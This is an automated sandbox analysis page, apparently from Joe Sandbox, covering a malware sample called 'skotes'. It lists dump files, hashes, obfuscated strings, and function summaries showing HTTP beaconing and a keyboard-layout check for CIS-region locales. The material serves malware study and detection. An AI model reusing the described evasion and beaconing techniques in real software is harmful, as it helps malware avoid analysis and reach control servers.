Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFile$CreateDirectory
String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
API String ID: 1875963930-2267310118
Opcode ID: 44a2214d80bbbf3990e478d48b8fc285d0adb55ef9e4beb648afe5b8448860bb
Instruction ID: f5e10af291127d661e326cb7603afb6be1d94e9be2a5cef09ee4698f043e14f5
Opcode Fuzzy Hash: 44a2214d80bbbf3990e478d48b8fc285d0adb55ef9e4beb648afe5b8448860bb
Instruction Fuzzy Hash: B0F24D71A001489BEF18DB38CD99B9DBB76AFC1304F148198E849A73D6DB359AC8CF51

Function 0094BE30 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 313
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,9CBA457E,?,00000000), ref: 0094BEB8
InternetOpenW.WININET(00998DC8,00000000,00000000,00000000,00000000), ref: 0094BEC8
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0094BEEC
HttpOpenRequestA.WININET(?,00000000), ref: 0094BF36
HttpSendRequestA.WININET(?,00000000), ref: 0094BFF5
InternetReadFile.WININET(?,?,000003FF,?), ref: 0094C0A7
InternetCloseHandle.WININET(?), ref: 0094C187
InternetCloseHandle.WININET(?), ref: 0094C18F
InternetCloseHandle.WININET(?), ref: 0094C197

Strings

stoi argument out of range, xrefs: 0094E4EA
RE1NXF==, xrefs: 0094BF0E
invalid stoi argument, xrefs: 0094E4F4
8HJUeMD Lq5=, xrefs: 0094C465
8HJUeIfzLo==, xrefs: 0094C3CB, 0094C623

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
API String ID: 2167506142-885246636
Opcode ID: ce3f2c02aebbac7c7bfd0663f74e61b8d133cd4c38d3da29bfddb9ede606c789
Instruction ID: a0fc13ad1dc7325a789824f24ab028fda56a2d4c25f443c24e4535b6ff3cf6ef
Opcode Fuzzy Hash: ce3f2c02aebbac7c7bfd0663f74e61b8d133cd4c38d3da29bfddb9ede606c789
Instruction Fuzzy Hash: DDB1D4B15011189FDB24CF28CC84F9EBB69EF85304F508199F909A72D2DB759AC4CF95

Function 00946020 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 275
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0094617D
RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00946271

Strings

00000422, xrefs: 009460C9
0000043f, xrefs: 0094612B
Keyboard Layout\Preload, xrefs: 00946054
00000423, xrefs: 009460FA
00000419, xrefs: 00946098

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: 95d25c904d4b82544cf5405d129a43f5ce519006414b825de813b7469097af84
Instruction ID: ab3a91ab8d3e91fa6a5d343d5cc6d053111c30edb8a86cc3546c18e8f34df0ff
Opcode Fuzzy Hash: 95d25c904d4b82544cf5405d129a43f5ce519006414b825de813b7469097af84
Instruction Fuzzy Hash: EBB1BDB19002689BEB24DB64CC84BDEB779AF05300F4442D8E508E72D1DB74AFA8CF95

Function 00947D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00947ED3

Strings

JjssOl==, xrefs: 0094813A
JjsrQV==, xrefs: 00948092
JjsrPl==, xrefs: 0094828A
JjssPV==, xrefs: 009481E2

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: 64b7ee1c07fd33829b6da0cd835adb70ac5e0a8fe50b8efc641073173a8dea82
Instruction ID: 05fda43ceb69e3c7965eb3920171488cd0764cd06f3abfbbfad4b6ca50f91373
Opcode Fuzzy Hash: 64b7ee1c07fd33829b6da0cd835adb70ac5e0a8fe50b8efc641073173a8dea82
Instruction Fuzzy Hash: 5DE12870E042149BDB14FBA8DD47B9E7B61ABC2724F94429CE819673D2DB344F858BC2

Function 00981ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00981775: CreateFileW.KERNEL32(00000000,00000000,?,00981B65,?,?,00000000,?,00981B65,00000000,0000000C), ref: 00981792

__dosmaperr.LIBCMT ref: 00981BD7
GetFileType.KERNEL32(00000000), ref: 00981BE3
__dosmaperr.LIBCMT ref: 00981BF6
__dosmaperr.LIBCMT ref: 00981D9C

Strings

H, xrefs: 00981D21

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
